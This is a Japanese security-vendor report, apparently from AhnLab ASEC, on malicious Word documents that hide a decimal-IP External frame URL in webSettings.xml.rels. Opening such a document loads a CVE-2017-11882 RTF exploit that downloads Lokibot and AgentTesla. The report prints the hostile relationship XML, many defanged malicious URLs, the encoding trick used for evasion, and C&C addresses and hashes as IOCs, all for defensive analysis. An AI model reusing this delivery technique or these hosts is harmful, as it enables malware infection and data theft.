MS Office Word ドキュメントの External 外部リンクへの接続が可能な点を利用し、さらなる RTF マルウェアを配布する不正な Word ファイルは、かなり前から持続的に確認されてきた。しかし最近、アンチウイルス製品の検知を回避するためと推定されるファイルが、韓国国内に多数拡散している状況が確認されていることについて報告する。
https://asec.ahnlab.com/jp/22437/

ビジネス目的に偽装した電子メールに Word ファイルを添付している点は大きく変わらないが、OOXML(Office Open XML)フォーマットの内部で確認できる webSettings.xml.rels ファイルに特異な点が存在する。以下のようにドキュメントを開くと自動接続される External URL は、これまでに出回っていた一般的な URL ではないことがわかる。
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="hxxp://zzzxcaaqwszazzxczxcadsqqazzxczczzzxqwaazzazxsaqwsaa@3221[45]7063/zxxsaassswq__zzzaxxsccvb__zxxxswqaaxxzzza_sdadzzqwqzzxs_dasdzsadasdas/zzxxxz_z_xcccc_zxxz[.]doc" TargetMode="External"/></Relationships>

この URL を Web ブラウザに入力すると、図2)のように URL の@マークより前の部分は削除され、@マークより後ろにある数字は自動的に IP 形式に変換される。
URL 上で、@マークより前の部分が削除される背景は以下の通りである。IE バージョン3.0~6.0までは以下のような URL を入力する試みに対し、基本の認証方法を利用するサイトにユーザー情報(username:password)を自動で送信することができた。
しかし、特定のセキュリティアップデート(MS 832894 リリース)が行われたあとからは URL の当該領域(@マークより前の部分)が無視されるのだが、攻撃者はこのような点を悪用して@マークより後ろに意味のあるデータ(IP に変換できる十進数)を記載したものと判断できる。関連する詳細内容は、Microsoft 技術文書で確認できる。
- http(s)://username:password@server/resource.txt

直近の2週間で韓国国内で拡散したものと確認されている多数の Word ファイルにおいて、上記のようなタイプの URL が確認された。
- hxxp://zzzxcaaqwszazzxczxcadsqqazzxczczzzxqwaazzazxsaqwsaa@3221[45]7063/zxxsaassswq__zzzaxxsccvb__zxxxswqaaxxzzza_sdadzzqwqzzxs_dasdzsadasdas/zzxxxz_z_xcccc_zxxz[.]doc
- hxxp://sdkjfksfjkjeigufdhgkfdgkhekhjhdfgkdgkhcicivbihberigidfghidgi@3236[13]5982/ego1/document_ego[.]doc
- hxxp://docment_dosc@3323[44]4136/uAuuUASDbjasduhuasduyuASHUDHUSAD
- hxxp://uUAzzyqqazzxxbbvvbdhsgfhdshqzbsdnsdzsfbnsdfgh@3221[44]8056/uuUAzzyqqazzxxbbvvbdhsgfhdshqzbsdnsdzsfbnsdfghdsfh/zxxaawazzzawwwazzasqwazzas[.]doc
- hxxp://zzxaaqwwweerss@1428[10]6757/zzxaaqwwweerrrrsszzxxzaaqqwwaaaqqzzzssweeessszzaazzswwe/zzxaaqwwweerrrrsszzxxzaaqqwwaaaq[.]doc
- hxxp://zqwerdfgvcbzasdcxssqwsedcfvfrdsaswwszawws@3221[44]8061/zxsswweerrss_zaqsddff_zxcvbfdd_qaszxxcc_zaswssxcv/zqasxxcvvfd_zqwwsdcxv[.]doc
- hxxp://wwerwerwrwerjasduhuasduyuASHUDHUSADHUASDU@3323[44]4136/zzwweqwwerwerwrwerjasduhuasduyuASHUDHUSADHUASDU/zaawqqqaazzzxcvbbvgtttyhhjjg[.]doc
- hxxp://aszqasdhjahsdjqzzaszwqasdasdasdjhj@2709[59]7246/ziioooooeroiooisodfo___————sdfjhjjhjhjhhj/ziiuewirisdfjhfjh[.]doc
- hxxp://aszqasdhjahsdjqzzaszwqasdasdasdjhj@1806[43]5509/ziioooooeroiooisodfo__———_—sdfjhjjhjhjhhj/zppolldookfodfdfdf_o[.]doc
- hxxp://zxqwsszzxxcvbfggzzzassqqweezzasszzzewwwsdzzzs@1755[84]8835/zxxswqqeerrdde_sdfsdf_zaqqwaa_zxzxssds/zxccvddqaa_szzxcxccx[.]doc
- hxxp://wwerwerwrwerjasduhuasduyuASHUDHUSADHUASDU@3323[44]4136/zzwweqwwerwerwrwerjasduhuasduyuASHUDHUSADHUASDU/zaawqqqaazzzxcvbbvgtttyhhjjg[.]doc
変換の原理について簡単に説明すると、IP アドレス(IPv4)は、8ビット(=octet)を基準に区分される32ビットで構成された2進数の組み合わせで構成されている。実際に 2進数の組み合わせ(ex.11000000)を入力して使用することは非常に不便なため、2進数に対応する10進数の数字(ex.192)を使用するのだが、我々が使用する普遍的な Web アクセス方法は10進数に対応するドメインを活用するものである。
このようにして DNS Lookup が行われるプロセスを逆にアクセスしてみると、External URL に存在する10進数「3221457063」は octet 単位に合わせて2進数「11000000 00000011 10001000 10100111」に変換され、前から順に「192 3 136 167」と変換されることがわかる。

すなわち、External URL が変換されるプロセスをまとめると以下の通りとなる。

上記のように最近出回っている URL 形式は、RTF バイナリを最初に実行していた Word ファイルにロードしたあと CVE-2017-11882 で知られている過去の RTF 脆弱性を利用しており、最終的には Lokibot、AgentTesla のような様々なインフォスティーラー型マルウェアをダウンロードする。
Word ドキュメントを開いた時に外部接続の試みが行われたこと自体は、External URL を利用して拡散した他のファイルと同じ不正な振る舞いと見て取れるが、解析および検知の観点では、攻撃者が内部ファイルの検知を回避する目的で External URL のフォーマットを変形させているものと判断できる。
ユーザーは V3 を最新バージョンにアップデートして使用し、出どころが不明なドキュメントファイルは開かないようにしなければならない。
[ファイル検知]
– Downloader/XML.External.S1942 (2022.10.25.02)
– Trojan/Win.Generic.C5290118 (2022.11.03.00)
– Trojan/Win.MSIL.R510204 (2022.10.27.01)
– RTF/Malform-A.Gen (2018.07.03)
[ビヘイビア検知]
– Malware/MDP.Download.M1881
[IOC]
MD5
– 655dc599da82d7acfd5f35683c3fe128 : 악성 워드 문서
– 402d0dc1120c20d21a539bd8d564a6c0 : RTF 바이너리
– 471130cf70d5bc013d818098fb55749a : Lokibot 바이너리
C&C およびダウンロード
– hxxp://192.3.136[.]167/zxxsaassswq__zzzaxxsccvb__zxxxswqaaxxzzza_sdadzzqwqzzxs_dasdzsadasdas/zzxxxz_z_xcccc_zxxz.doc
– hxxp://192.3.136[.]167/322/vbc.exe
– hxxp://208.67.105[.]162/perez/five/fre.php
– hxxp://192.227.132[.]46/
– hxxp://192.3.101[.]120/
– hxxp://85.31.46[.]5/
– hxxp://192.3.101[.]125/
– hxxp://198.23.187[.]168/
– hxxp://161.129.44[.]62/
– hxxp://107.172.4[.]181/
– hxxp://104.168.32[.]131/
– hxxp://198.23.187[.]168/
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報